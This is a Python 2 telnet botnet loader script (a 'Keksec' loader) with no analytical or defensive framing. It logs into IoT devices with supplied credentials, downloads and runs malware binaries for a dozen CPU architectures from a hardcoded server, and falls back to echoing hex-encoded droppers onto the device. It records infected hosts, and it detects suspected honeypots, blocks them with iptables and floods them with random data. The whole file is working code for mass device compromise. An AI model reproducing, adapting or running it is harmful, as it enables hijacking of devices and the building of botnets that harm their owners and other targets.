#!/usr/bin/python #Phaaaat hax telnet loader by Freak/Milenko #this loader actively detects honeypots using incorrect user agents when requesting bins. #it will actively block any detected honeypot with iptables. #USAGE(S): #ANTI HONEYPOT MODE: #cat list.txt | python loader.py 1 8081 #DUMBASS MODE #cat list.txt | python loader.py 0 #SELFREP MODE (recommended) configure capsaicin for scanlisten port #ncat -kvlp scanlistenport | python loader.py 1 8081 import sys, re, os, socket, time, select,sys from threading import Thread serverip = "1.3.3.7" binprefix = "/bins/keksec" binname = binprefix.split("/")[-1] rekdevice = """cd /tmp || cd /var/run || cd /mnt || cd /root || cd / cd /tmp || cd $(find / -writable | head -n 1); wget http://""" + serverip + binprefix + """.mips -O keksec.mips; busybox wget http://""" + serverip + binprefix + """.mips -O keksec.mips; chmod 777 """ + binname + """.mips; ./""" + binname + """.mips; rm -f """ + binname + """.mips wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; busybox wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; chmod 777 """ + binname + """.mpsl; ./""" + binname + """.mpsl; rm -f """ + binname + """.mpsl wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; busybox wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; chmod 777 """ + binname + """.sh4; ./""" + binname + """.sh4; rm -f """ + binname + """.sh4 wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; busybox wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; chmod 777 """ + binname + """.x86; ./""" + binname + """.x86; rm -f """ + binname + """.x86 wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; busybox wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; chmod 777 """ + binname + """.arm7; ./""" + binname + """.arm7; rm -f """ + binname + """.arm7 wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; busybox wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; chmod 777 """ + binname + """.x64; ./""" + binname + """.x64; rm -f """ + binname + """.x64 wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; busybox wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; chmod 777 """ + binname + """.ppc; ./""" + binname + """.ppc; rm -f """ + binname + """.ppc wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; busybox wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; chmod 777 """ + binname + """.i586; ./""" + binname + """.i586; rm -f """ + binname + """.i586 wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; busybox wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; chmod 777 """ + binname + """.m68k; ./""" + binname + """.m68k; rm -f """ + binname + """.m68k wget http://""" + serverip + binprefix + """.spc -O keksec.spc; busybox wget http://""" + serverip + binprefix + """.spc -O keksec.spc; chmod 777 """ + binname + """.spc; ./""" + binname + """.spc; rm -f """ + binname + """.spc wget http://""" + serverip + binprefix + """.arm -O keksec.arm; busybox wget http://""" + serverip + binprefix + """.arm -O keksec.arm; chmod 777 """ + binname + """.arm; ./""" + binname + """.arm; rm -f """ + binname + """.arm wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; busybox wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; chmod 777 """ + binname + """.arm5; ./""" + binname + """.arm5; rm -f """ + binname + """.arm5 wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; busybox wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; chmod 777 """ + binname + """.ppc-440fp; ./""" + binname + """.ppc-440fp; rm -f """ + binname + """.ppc-440fp""" rekdevice = rekdevice.replace("\r", "").split("\n") global fh fh = open("bots.txt","a+") def chunkify(lst,n): return [ lst[i::n] for i in xrange(n) ] running = 0 global echo global tftp global wget global logins global echoed echoed = [] tftp = 0 wget = 0 echo = 0 logins = 0 ran = 0 def printStatus(): global echo global tftp global wget global logins global ran while 1: time.sleep(5) print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + " Ran:" + str(ran) + " Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m" def readUntil(tn, advances, timeout=8): buf = '' start_time = time.time() while time.time() - start_time < timeout: buf += tn.recv(1024) time.sleep(0.1) for advance in advances: if advance in buf: return buf return "" def recvTimeout(sock, size, timeout=8): sock.setblocking(0) ready = select.select([sock], [], [], timeout) if ready[0]: data = sock.recv(size) return data return "" def contains(data, array): for test in array: if test in data: return True return False def split_bytes(s, n): assert n >= 4 start = 0 lens = len(s) while start < lens: if lens - start <= n: yield s[start:] return # StopIteration end = start + n assert end > start yield s[start:end] start = end global badips badips=[] def fileread(): fh=open("honeypots.txt", "rb") data=fh.read() fh.close() return data def clientHandler(c, addr): global badips try: if addr[0] not in badips and addr[0] not in fileread(): print addr[0] + ":" + str(addr[1]) + " has connected!" request = recvTimeout(c, 8912) if "curl" not in request and "Wget" not in request: if addr[0] not in fileread(): fh=open("honeypots.txt", "a") fh.write(addr[0]+"\n") fh.close() os.popen("iptables -A INPUT -s " + addr[0] + " -j DROP") badips.append(addr[0]) print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!" c.send("fuck you GOOF HONEYPOT GET OUT\r\n") for i in range(10): c.send(os.urandom(65535*2)) else: c.send("fuck you GOOF HONEYPOT GET OUT\r\n") for i in range(10): c.send(os.urandom(65535*2)) c.close() except Exception as e: #print str(e) pass def honeyserver(honeyport): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('', honeyport)) s.listen(999999999) while 1: try: c, addr = s.accept() Thread(target=clientHandler, args=(c, addr,)).start() except: pass if sys.argv[1]=="1": Thread(target=honeyserver, args=(int(sys.argv[2]),)).start() def infect(ip, username, password): global badips global echo global tftp global wget global logins global ran global echoed if ip in echoed: return infectedkey = "CAPSAICIN" try: tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tn.settimeout(1) tn.connect((ip, 23)) except: try: tn.close() except: pass return try: hoho = '' hoho += readUntil(tn, ":") if ":" in hoho: tn.send(username + "\n") time.sleep(0.1) hoho = '' hoho += readUntil(tn, ":") if ":" in hoho: tn.send(password + "\n") time.sleep(0.8) else: pass prompt = '' prompt += recvTimeout(tn, 8192) if ">" in prompt and "ONT" not in prompt: success = True elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt: success = True else: tn.close() return except: tn.close() return if success == True: try: tn.send("enable\r\n") tn.send("system\r\n") tn.send("shell\r\n") tn.send("sh\r\n") tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n") except: tn.close() return time.sleep(1) try: buf = recvTimeout(tn, 8192) except: tn.close() return if "AK47" in buf: if sys.argv[1] == "1": tn.send("wget http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n"); tn.send("curl http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n"); time.sleep(3) recvTimeout(tn, 8192) if ip in badips: return print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip) logins += 1 fh.write(ip + ":23 " + username + ":" + password + "\n") fh.flush() for rek in rekdevice: tn.send(rek + "\r\n") time.sleep(3) buf = recvTimeout(tn, 1024*1024) loaded = False if "bytes" in buf: print "\033[32m[\033[31m+\033[32m] \033[33mwget \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip) tftp += 1 loaded = True elif "saved" in buf: print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip) wget += 1 loaded = True if infectedkey in buf: ran += 1 print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip) f=open("infected.txt", "a") f.write(ip +":23 " + username + ":" + password + "\r\n") f.close() #if loaded: # tn.close() # return tn.send("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /\r\n") tn.send("cat /proc/mounts;busybox cat /proc/mounts\r\n") mounts = recvTimeout(tn, 1024*1024) for line in mounts.split("\n"): try: path = line.split(" ")[1] if " rw" in line: tn.send("echo -e '%s' > %s/.keksec; cat %s/.keksec;busybox cat %s/.keksec; rm %s/.keksec;busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path)) if "AK47" in recvTimeout(tn, 1024*1024): tn.send("cd %s\r\n" % path) #cd into the writeable directory except: continue for binary in "dlr.arm dlr.arm7 dlr.mips dlr.x86 dlr.mpsl dlr.m68k dlr.sh4 dlr.ppc dlr.spc".split(" "): try: first = True count = 0 hexdata = [] for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128): hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk)))) parts = len(hexdata) for hexchunk in hexdata: seq = ">" if first else ">>" tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")#;busybox echo -ne '" + hexchunk + "' " + seq + "\r\n") first = False count += 1 time.sleep(0.01) print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m" tn.send("chmod 777 updDl;busybox chmod 777 updDl\r\n") tn.send("./updDl\r\n") time.sleep(5) tn.send("rm -rf ./updDl\r\n") time.sleep(0.1) tn.send("./gsdfsdf424r24\r\n") #change this to dvrHelper if using mirai time.sleep(1) tn.send("rm -rf ./gsdfsdf424r24\r\n") #and this buf = recvTimeout(tn, 1024*1024) if "FIN" in buf: echo += 1 print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary) tn.close() f=open("echoes.txt","a") f.write(ip +":23 " + username + ":" + password + "\r\n") f.close() echoed.append(ip) if infectedkey in buf: ran += 1 f=open("infected.txt", "a") f.write(ip +":23 " + username + ":" + password + "\r\n") f.close() print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip) tn.close() return except Exception as e: # print str(e) return else: # tn.close() return def check(chunk, fh): global running running += 1 threadID = running for login in chunk: try: port = 23 if ":23 " in login: login = login.replace(":23 ", ":") port = 23 if ":2323 " in login: login = login.replace(":2323 ", ":") port = 2323 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) try: socket.inet_aton(login.split(":")[0]) ip = login.split(":")[0] username = login.split(":")[1] password = login.split(":")[2] except: try: socket.inet_aton(login.split(":")[2]) ip = login.split(":")[2] username = login.split(":")[0] password = login.split(":")[1] except: continue s.connect((ip, port)) s.close() infect(ip, username, password) except: pass running -= 1 while 1: if running >= 512: time.sleep(0.3) try: Thread(target = check, args = ([raw_input()], fh,)).start() except KeyboardInterrupt: os.kill(os.getpid(), 9) except Exception: pass